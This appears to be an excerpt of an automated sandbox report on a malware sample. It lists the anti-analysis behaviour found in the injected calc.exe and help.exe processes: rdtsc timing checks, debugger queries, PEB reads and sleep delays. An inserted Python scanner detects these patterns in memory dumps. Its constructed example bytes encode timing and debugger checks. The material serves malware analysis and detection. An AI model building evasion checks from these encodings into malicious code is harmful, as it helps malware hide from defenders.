          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000001A98E4 second address: 00000000001A98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000001A9B4E second address: 00000000001A9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00409A80 rdtsc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4706
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4066
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3556Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5884Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\SysWOW64\help.exe TID: 4732Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 0000000A.00000000.303017451.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000A.00000000.320295522.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000A.00000000.280926242.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 0000000A.00000000.303675861.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 0000000A.00000000.329155939.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 0000000A.00000000.303675861.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\calc.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_00409A80 rdtsc
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0040ACC0 LdrLoadDll,
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03478B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D3B7A mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033ADB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0346131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033AF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033ADB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_034253CA mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D4BAD mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033B1B8F mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0345D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0346138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033CDBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D03E2 mov eax, dword ptr fs:[00000030h] (x6)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03475BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E4A2C mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03434257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033C3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0345B260 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03478A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A5210 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033AAA16 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033B8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A9240 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033BAAB0 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A52A5 mov eax, dword ptr fs:[00000030h] (x5)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DD294 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D513A mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033C4120 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033C4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A9100 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033AB171 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033AC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033CB944 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D61A0 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_034341E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033CC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033AB1E1 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_034269A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_034251BE mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D002D mov eax, dword ptr fs:[00000030h] (x5)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033BB02A mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03471074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03462073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03474015 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03427016 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033C0050 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DF0BF mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0343B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0343B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0343B8D0 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D20A0 mov eax, dword ptr fs:[00000030h] (x6)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03423884 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A4F2E mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033CF716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03478F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DA70E mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0347070D mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0343FF10 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033BFF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033BEF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033B8794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E37F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03427794 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033AE620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DA61C mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033AC600 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03461608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033CAE73 mov eax, dword ptr fs:[00000030h] (x5)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033B766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0345FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033B7E41 mov eax, dword ptr fs:[00000030h] (x6)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0345FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03478ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0343FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033B76E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03470EA5 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_034246A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03423540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D4D3B mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033AAD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h] (x13)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033CC577 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033C7D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03478D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0342A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D1DB5 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03426DC9 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03426DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03426DC9 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DFD9B mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A2D8A mov eax, dword ptr fs:[00000030h] (x5)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03458DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D2581 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033BD5E0 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_034705AC mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DBC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0343C450 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h] (x14)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03426C0A mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0347740D mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033C746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03478CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033B849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03426CF0 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_034614FB mov eax, dword ptr fs:[00000030h]
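The evidence above mixes two kinds of finding that deserve different weight. The VMware and Hyper-V strings come from explorer.exe memory dumps; any process on a VMware guest can carry such device paths and error texts, so on their own they show where the sandbox ran, not that the sample looks for them. The rdtsc at 9_2_00409A80, the DebugPort query and the `mov eax, dword ptr fs:[00000030h]` reads (fs:[30h] is the PEB pointer in a 32-bit process, here the SysWOW64 calc.exe the sample injected into) sit in the injected code and are the actual anti-analysis logic. The following Python scanner, added here as an example and not part of Joe Sandbox or of the sample, reproduces both kinds of finding on a raw dump: it locates the instruction encodings, pairs rdtsc reads so that a timing check is told apart from a stray 0F 31, scans hypervisor markers in ASCII and UTF-16LE, and weighs the result. The dump it scans is constructed for illustration; the marker list, the register set in the encodings and the 64-byte rdtsc pairing window are assumptions to tune.

```python
"""Scan a raw memory dump for the evasion evidence listed in this report.

Added example for this report; not Joe Sandbox code and not FormBook code.
build_sample_dump() is constructed for illustration, no byte of it is taken
from the analysed sample.  Assumptions: 32-bit x86 code (SysWOW64, as in
the report), the marker list below, and a 64-byte rdtsc pairing window."""
import re

# 32-bit x86 encodings.  0x64 is the FS segment-override prefix; in a 32-bit
# Windows process FS:[0x30] is the PEB pointer and FS:[0x18] the TEB pointer.
#   64 A1 30 00 00 00      mov eax, dword ptr fs:[30h]
#   64 8B 0D 30 00 00 00   mov ecx, dword ptr fs:[30h]  (ModRM mod=00 rm=101, disp32)
#   0F 31                  rdtsc
_FS_LOAD = rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x35\x3D])"
CODE_PATTERNS = {
    "peb_read_fs30": re.compile(_FS_LOAD + rb"\x30\x00\x00\x00"),
    "teb_read_fs18": re.compile(_FS_LOAD + rb"\x18\x00\x00\x00"),
    "rdtsc": re.compile(rb"\x0F\x31"),
}

# Hypervisor artefacts of the kind the report lists (assumed list; extend as
# needed).  Scanned as ASCII and UTF-16LE because Windows keeps device paths
# and error messages as wide strings.
VM_MARKERS = ("VMware", "NECVMWar", "Virtual_disk", "Hyper-V",
              "VBOX", "VirtualBox", "QEMU", "innotek")


def find_code_patterns(data: bytes) -> dict:
    """Offsets of every evasion-related instruction encoding in data."""
    return {name: [m.start() for m in pat.finditer(data)]
            for name, pat in CODE_PATTERNS.items()}


def rdtsc_timing_pairs(offsets, max_gap: int = 64) -> list:
    """A timing check needs two rdtsc reads close together; a lone rdtsc, or a
    stray 0F 31 inside data, is not evidence of one."""
    offsets = sorted(offsets)
    return [(a, b) for a, b in zip(offsets, offsets[1:]) if b - a <= max_gap]


def find_vm_strings(data: bytes) -> list:
    """(offset, marker, encoding) for every hypervisor marker in data."""
    hits = []
    for marker in VM_MARKERS:
        for enc in ("ascii", "utf-16-le"):
            needle = re.escape(marker.encode(enc))
            for m in re.finditer(needle, data, flags=re.IGNORECASE):
                hits.append((m.start(), marker, enc))
    return sorted(hits)


def triage(data: bytes, dump_is_sample_code: bool) -> dict:
    """Weigh the findings the way the report lines should be read: instruction
    patterns inside the sample's own code are strong evidence; hypervisor
    strings are weak on their own, because any process on a VMware guest can
    carry them whether or not the sample ever looks at them."""
    code = find_code_patterns(data)
    pairs = rdtsc_timing_pairs(code["rdtsc"])
    strings = find_vm_strings(data)
    strong = dump_is_sample_code and (bool(pairs) or bool(code["peb_read_fs30"]))
    if strong:
        verdict = "strong: anti-analysis code present"
    elif strings:
        verdict = "weak: environment strings only"
    else:
        verdict = "none"
    return {"peb_reads": len(code["peb_read_fs30"]),
            "teb_reads": len(code["teb_read_fs18"]),
            "rdtsc_total": len(code["rdtsc"]),
            "rdtsc_timing_pairs": pairs,
            "vm_strings": strings,
            "verdict": verdict}


def build_sample_dump() -> bytes:
    """Constructed dump: three tiny 'functions' separated by int3 padding, a
    lone rdtsc far away, then a data area holding hypervisor strings."""
    timing_check = (b"\x0F\x31"              # rdtsc
                    b"\x8B\xD8"              # mov ebx, eax
                    b"\x0F\xA2"              # cpuid (serialising; common in VM timing checks)
                    b"\x0F\x31"              # rdtsc
                    b"\x2B\xC3"              # sub eax, ebx
                    b"\x3D\x00\x10\x00\x00"  # cmp eax, 1000h
                    b"\xC3")                 # ret
    being_debugged = (b"\x64\xA1\x30\x00\x00\x00"  # mov eax, fs:[30h]           ; PEB
                      b"\x0F\xB6\x40\x02"          # movzx eax, byte ptr [eax+2] ; PEB.BeingDebugged
                      b"\xC3")                     # ret
    peb_to_ecx = b"\x64\x8B\x0D\x30\x00\x00\x00\xC3"  # mov ecx, fs:[30h] ; ret
    lone_rdtsc = b"\x0F\x31\xC3"                     # rdtsc ; ret (no partner)
    data = (b"VMware SATA CD00" + b"\x00" * 8
            + "\\\\?\\SCSI#CdRom&Ven_NECVMWar".encode("utf-16-le") + b"\x00" * 8
            + b"harmless text" + b"\x00" * 8)
    return (timing_check + b"\xCC" * 8 + being_debugged + b"\xCC" * 8
            + peb_to_ecx + b"\xCC" * 96 + lone_rdtsc + b"\xCC" * 8 + data)


if __name__ == "__main__":
    dump = build_sample_dump()
    print("unpacked code region:", triage(dump, dump_is_sample_code=True))
    print("host-process heap   :", triage(dump, dump_is_sample_code=False))
```

Run it against a real dump with `triage(open(path, "rb").read(), dump_is_sample_code=True)` for the unpacked region of the injected process and with `False` for a host-process heap dump such as the explorer.exe ones above. In 64-bit code the PEB is read from gs:[60h] instead (65 48 8B 04 25 60 00 00 00), so the pattern set needs extending before scanning x64 dumps.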
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A852A5 mov eax, dword ptr fs:[00000030h] (x5)
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B50EA5 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B046A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A9AAB0 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ABFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B1FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ABD294 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AB16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A976E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B58ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AB36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B3FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A8E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B3FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A8C600 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AA3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ABA61C mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A9766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B3B260 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B58A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AAAE73 mov eax, dword ptr fs:[00000030h] (x5)
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B14257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A89240 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A97E41 mov eax, dword ptr fs:[00000030h] (x6)
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B55BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B07794 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B3D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B4138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A84F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A84F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B4131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B58F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9EF40 mov eax, dword ptr fs:[00000030h]
